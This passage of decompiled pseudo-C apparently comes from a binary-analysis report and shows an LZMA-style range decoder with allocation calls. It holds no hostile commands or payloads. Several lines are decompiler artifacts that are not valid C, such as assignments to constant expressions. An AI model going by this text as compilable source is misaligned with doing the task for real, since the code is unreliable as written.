								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
